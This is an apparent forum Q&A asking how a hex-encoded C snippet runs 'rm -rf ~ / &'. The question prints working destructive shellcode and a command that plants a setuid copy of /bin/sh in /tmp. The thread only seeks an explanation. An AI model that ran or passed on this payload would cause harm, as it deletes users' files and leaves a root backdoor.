# How hex command becomes rm -rf ~ / &?

Tags: linux, bash, c

How does the following malicious command become rm -rf ~ / & when compiled?

```
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
```

Comment: Just try to compile a small code like `system("ls")` and look into its assembly content.

Comment: I don't know assembly :(

Answer (score 2, accepted):

It's called [shellcode](http://www.vividmachines.com/shellcode/shellcode.html).

Basically the hex codes are determined from the assembled machine code and correspond to byte locations of Linux system calls.

Comment: How does the code even compile without an error like "undefined reference to 'main'"?

Comment: @Demetri, that's quite simple: this variable is assembly code that's running when you run your compiled program.